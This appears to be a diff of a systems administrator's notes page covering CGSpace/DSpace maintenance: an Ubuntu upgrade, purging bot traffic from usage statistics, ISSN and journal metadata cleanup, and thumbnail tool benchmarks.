<li>I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually</li>
</ul>
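<ul>
<li>A sketch of that manual step (the source host and library paths are assumptions):
<pre tabindex="0"><code class="language-console" data-lang="console">$ scp ubuntu20:/usr/lib/x86_64-linux-gnu/libcrypt.so.1.1.0 /tmp/
# cp /tmp/libcrypt.so.1.1.0 /usr/lib/x86_64-linux-gnu/
# ln -sf libcrypt.so.1.1.0 /usr/lib/x86_64-linux-gnu/libcrypt.so.1
</code></pre>
</li>
</ul>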
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt install -f
# apt dist-upgrade
# reboot
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt install -f
</span></span><span style="display:flex;"><span># apt dist-upgrade
</span></span><span style="display:flex;"><span># reboot
</span></span></code></pre></div><ul>
<li>After rebooting I purged all packages with residual configs and cleaned up again:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span></code></pre></div><ul>
<li>Then I cleared my local Ansible fact cache and re-ran the <a href="https://github.com/ilri/rmg-ansible-public">infrastructure playbooks</a></li>
<li>Open <a href="https://github.com/ilri/OpenRXV/issues/111">an issue for the value mappings global replacement bug in OpenRXV</a></li>
<li>Advise Peter and Abenet on expected CGSpace budget for 2022</li>
@@ -190,21 +190,21 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2021-08-05-all-ips.txt
# wc -l /tmp/2021-08-05-all-ips.txt
43428 /tmp/2021-08-05-all-ips.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2021-08-05-all-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/2021-08-05-all-ips.txt
</span></span><span style="display:flex;"><span>43428 /tmp/2021-08-05-all-ips.txt
</span></span></code></pre></div><ul>
<li>Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!)
<ul>
<li>Indeed, now I see that there are no IPs from those networks coming in now:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/2021-08-05-all-ips-to-purge.csv
$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
0 /tmp/2021-08-05-all-ips-to-purge.csv
</code></pre></div><h2 id="2021-08-08">2021-08-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/2021-08-05-all-ips-to-purge.csv
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</span></span><span style="display:flex;"><span>0 /tmp/2021-08-05-all-ips-to-purge.csv
</span></span></code></pre></div><h2 id="2021-08-08">2021-08-08</h2>
<ul>
<li>Advise IWMI colleagues on best practices for thumbnails</li>
<li>Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest
@@ -220,8 +220,8 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
</span></span></code></pre></div><ul>
<li>That IP is on Amazon, and from looking at the DSpace logs I don&rsquo;t see them logging in at all, only scraping&hellip; so I will purge hits from that IP</li>
<li>I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, so I will purge their hits too
<ul>
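<li>(One way to confirm an IP never logs in is to count its distinct sessions in dspace.log; a sketch, with the log file glob assumed:)
<pre tabindex="0"><code class="language-console" data-lang="console">$ grep 93.158.90.30 dspace.log.2021-08-* | grep -oE &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
</code></pre>
</li>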
@@ -232,14 +232,14 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
<li>3.225.28.105 uses a normal-looking user agent but makes thousands of requests to the REST API a few seconds apart</li>
<li>61.143.40.50 is in China and uses this hilarious user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}&#34;
</span></span></code></pre></div><ul>
<li>47.252.80.214 is owned by Alibaba in the US and has the same user agent</li>
<li>159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours</li>
<li>95.87.154.12 seems to be a new bot with the following user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
</span></span></code></pre></div><ul>
<li>They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU
<ul>
<li>I will purge the hits and add them to our list of bot overrides in the meantime, before I submit it to COUNTER-Robots</li>
@@ -247,37 +247,37 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</li>
<li>I see a new bot using this user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">nettle (+https://www.nettle.sk)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nettle (+https://www.nettle.sk)
</span></span></code></pre></div><ul>
<li>129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.</li>
<li>217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day</li>
<li>103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human</li>
<li>There are probably more, but those are most of the ones with over 1,000 hits last month, so I will purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 10796 hits from 35.174.144.154 in statistics
Purging 9993 hits from 93.158.90.30 in statistics
Purging 6092 hits from 130.255.162.173 in statistics
Purging 24863 hits from 3.225.28.105 in statistics
Purging 2988 hits from 93.158.90.91 in statistics
Purging 2497 hits from 61.143.40.50 in statistics
Purging 13866 hits from 159.138.131.15 in statistics
Purging 2721 hits from 95.87.154.12 in statistics
Purging 2786 hits from 47.252.80.214 in statistics
Purging 1485 hits from 129.0.211.251 in statistics
Purging 8952 hits from 217.182.21.193 in statistics
Purging 3446 hits from 103.135.104.139 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 90485
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 10796 hits from 35.174.144.154 in statistics
</span></span><span style="display:flex;"><span>Purging 9993 hits from 93.158.90.30 in statistics
</span></span><span style="display:flex;"><span>Purging 6092 hits from 130.255.162.173 in statistics
</span></span><span style="display:flex;"><span>Purging 24863 hits from 3.225.28.105 in statistics
</span></span><span style="display:flex;"><span>Purging 2988 hits from 93.158.90.91 in statistics
</span></span><span style="display:flex;"><span>Purging 2497 hits from 61.143.40.50 in statistics
</span></span><span style="display:flex;"><span>Purging 13866 hits from 159.138.131.15 in statistics
</span></span><span style="display:flex;"><span>Purging 2721 hits from 95.87.154.12 in statistics
</span></span><span style="display:flex;"><span>Purging 2786 hits from 47.252.80.214 in statistics
</span></span><span style="display:flex;"><span>Purging 1485 hits from 129.0.211.251 in statistics
</span></span><span style="display:flex;"><span>Purging 8952 hits from 217.182.21.193 in statistics
</span></span><span style="display:flex;"><span>Purging 3446 hits from 103.135.104.139 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 90485
</span></span></code></pre></div><ul>
<li>Then I purged a few thousand more by user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri
Found 2707 hits from MaCoCu in statistics
Found 1785 hits from nettle in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 4492
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri
</span></span><span style="display:flex;"><span>Found 2707 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Found 1785 hits from nettle in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 4492
</span></span></code></pre></div><ul>
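<li>For context, that agents file is just a list of case-sensitive regexes, one per line; a sketch using the patterns purged above:
<pre tabindex="0"><code class="language-console" data-lang="console">$ grep -E &#39;^(MaCoCu|nettle)$&#39; dspace/config/spiders/agents/ilri
MaCoCu
nettle
</code></pre>
</li>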
<li>I found some CGSpace metadata in the wrong fields
<ul>
<li>Seven metadata values in dc.subject (57) should be in dcterms.subject (187)</li>
@@ -289,8 +289,8 @@ Found 1785 hits from nettle in statistics
</li>
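<li>Moving those between fields is a quick SQL fix; a hedged sketch using the field IDs above (in practice the <code>WHERE</code> clause should be restricted to the affected values):
<pre tabindex="0"><code class="language-console" data-lang="console">localhost/dspace= &gt; BEGIN;
localhost/dspace= &gt; UPDATE metadatavalue SET metadata_field_id=187 WHERE metadata_field_id=57;
localhost/dspace= &gt; COMMIT;
</code></pre>
</li>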
<li>I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]&#39;</span> /tmp/2021-08-08-cgspace.csv &gt; /tmp/2021-08-08-issn-isbn.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]&#39;</span> /tmp/2021-08-08-cgspace.csv &gt; /tmp/2021-08-08-issn-isbn.csv
</span></span></code></pre></div><ul>
<li>Then in OpenRefine I merged all null, blank, and en fields into the <code>en_US</code> one for each, removed all spaces, fixed invalid multi-value separators, removed everything other than ISSN/ISBNs themselves
<ul>
<li>In total it was a few thousand metadata entries or so, so I had to split the CSV with <code>xsv split</code> in order to process it</li>
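<li>A sketch of that split (the chunk size and output directory are assumptions):
<pre tabindex="0"><code class="language-console" data-lang="console">$ xsv split -s 2000 /tmp/issn-split /tmp/2021-08-08-issn-isbn.csv
</code></pre>
</li>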
@@ -303,20 +303,20 @@ Found 1785 hits from nettle in statistics
<ul>
<li>Extract all unique ISSNs to look up on Sherpa Romeo and Crossref</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;cg.issn[en_US]&#39;</span> ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c <span style="color:#ae81ff">1</span> -r <span style="color:#e6db74">&#39;^[0-9]{4}&#39;</span> | sed 1d | sort | uniq &gt; /tmp/2021-08-09-issns.txt
$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.issn[en_US]&#39;</span> ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c <span style="color:#ae81ff">1</span> -r <span style="color:#e6db74">&#39;^[0-9]{4}&#39;</span> | sed 1d | sort | uniq &gt; /tmp/2021-08-09-issns.txt
</span></span><span style="display:flex;"><span>$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
</span></span><span style="display:flex;"><span>$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
</span></span></code></pre></div><ul>
<li>Then I updated the CSV headers for each and joined the CSVs on the issn column:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sed -i <span style="color:#e6db74">&#39;1s/journal title/sherpa romeo journal title/&#39;</span> /tmp/2021-08-09-journals-sherpa-romeo.csv
$ sed -i <span style="color:#e6db74">&#39;1s/journal title/crossref journal title/&#39;</span> /tmp/2021-08-09-journals-crossref.csv
$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv &gt; /tmp/2021-08-09-journals-all.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/sherpa romeo journal title/&#39;</span> /tmp/2021-08-09-journals-sherpa-romeo.csv
</span></span><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/crossref journal title/&#39;</span> /tmp/2021-08-09-journals-crossref.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv &gt; /tmp/2021-08-09-journals-all.csv
</span></span></code></pre></div><ul>
<li>In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">if(cells[&#39;sherpa romeo journal title&#39;].value == cells[&#39;crossref journal title&#39;].value,&#34;same&#34;,&#34;different&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(cells[&#39;sherpa romeo journal title&#39;].value == cells[&#39;crossref journal title&#39;].value,&#34;same&#34;,&#34;different&#34;)
</span></span></code></pre></div><ul>
<li>Then I exported the list of journals that differ and sent it to Peter for comments and corrections
<ul>
<li>I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it</li>
@ -332,15 +332,15 @@ $ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-jour
</li>
<li>I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;</span>
39004:0.08
$ /usr/bin/time -f %M:%e gm convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality <span style="color:#ae81ff">85</span> -thumbnail x600 -flatten IPCC-gm.jpg
40932:0.53
$ /usr/bin/time -f %M:%e convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
41724:0.59
$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality <span style="color:#ae81ff">85</span> -thumbnail 600x600 IPCC-im.jpg
24736:0.04
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span><span style="display:flex;"><span>39004:0.08
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e gm convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality <span style="color:#ae81ff">85</span> -thumbnail x600 -flatten IPCC-gm.jpg
</span></span><span style="display:flex;"><span>40932:0.53
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
</span></span><span style="display:flex;"><span>41724:0.59
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality <span style="color:#ae81ff">85</span> -thumbnail 600x600 IPCC-im.jpg
</span></span><span style="display:flex;"><span>24736:0.04
</span></span></code></pre></div><ul>
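<li>To compare the tools more systematically, the same measurement could be looped over a set of PDFs (a sketch; the file names are assumed):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ for pdf in *.pdf; do /usr/bin/time -f &#34;$pdf vips %M:%e&#34; vipsthumbnail &#34;$pdf&#34; -s 600 -o &#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;; done
</span></span><span style="display:flex;"><span>$ for pdf in *.pdf; do /usr/bin/time -f &#34;$pdf gm %M:%e&#34; gm convert &#34;${pdf}[0]&#34; -quality 85 -thumbnail x600 -flatten &#34;${pdf%.pdf}-gm.jpg&#34;; done
</span></span></code></pre></div><ul>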
<li>The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
<ul>
<li>libvips does use less time and memory&hellip; I should do more tests!</li>
@ -359,17 +359,17 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d &gt; /tmp/journals1.txt
$ csvcut -c <span style="color:#e6db74">&#39;sherpa romeo journal title&#39;</span> ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d &gt; /tmp/journals2.txt
$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
1911
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d &gt; /tmp/journals1.txt
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;sherpa romeo journal title&#39;</span> ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d &gt; /tmp/journals2.txt
</span></span><span style="display:flex;"><span>$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
</span></span><span style="display:flex;"><span>1911
</span></span></code></pre></div><ul>
<li>Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine</li>
<li>I exported a list of all the journal titles we have in the <code>cg.journal</code> field:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT(text_value) AS &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
COPY 3245
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT(text_value) AS &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
</span></span><span style="display:flex;"><span>COPY 3245
</span></span></code></pre></div><ul>
<li>I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don&rsquo;t match, so I&rsquo;d have to go check many of them manually before selecting a match or fixing them&hellip;
<ul>
<li>I think it&rsquo;s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way</li>
@ -421,10 +421,10 @@ COPY 3245
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/72600
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/35730
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/76451
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/72600
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/35730
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/76451
</span></span></code></pre></div><ul>
<li>I made a minor fix to OpenRXV to prefix all image names with <code>docker.io</code> so it works with fewer changes on podman
<ul>
<li>Docker assumes the <code>docker.io</code> registry by default, but we should be explicit</li>
@ -446,40 +446,40 @@ $ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10
</li>
<li>Lower case all AGROVOC metadata, as I had noticed a few in sentence case:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 484
